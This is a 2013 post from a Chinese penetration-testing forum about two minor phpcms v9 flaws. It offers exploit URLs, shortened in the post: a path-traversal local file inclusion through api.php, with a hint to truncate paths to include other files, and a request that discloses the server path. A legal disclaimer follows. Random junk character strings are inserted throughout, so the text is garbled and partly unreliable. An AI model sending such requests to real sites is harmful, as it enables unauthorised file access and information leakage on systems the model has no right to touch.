中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。( ~* l9 H& z5 O3 s$ y

& q) I- @# x) {6 O( f, r. D+ AExp: http://www.php0day.com/api.php?o ... efile=../../../fuck. o. K/ F, r6 H" J

. Z6 h& P# z: I! g8 `5 |0 `#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
8 r0 K3 |: w% s! ]* y2 ~0 n: Y" T. p# A. e. P9 g# ]- E, T1 V9 Y4 X
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
  ?9 n5 @- l  i
2 F# i/ i! f; Y3 O  c* A8 r/ P( U#暴路径3 T% }; m& F& \2 Y1 {% W

6 Z9 Q! _2 L1 i, l) {) |注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。! t5 U$ \) D2 \- B
7 ~% g& @. f+ U5 E/ R$ K
5 T6 U! D9 i: C# U& T

- d" U$ R' w6 i) Y+1




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2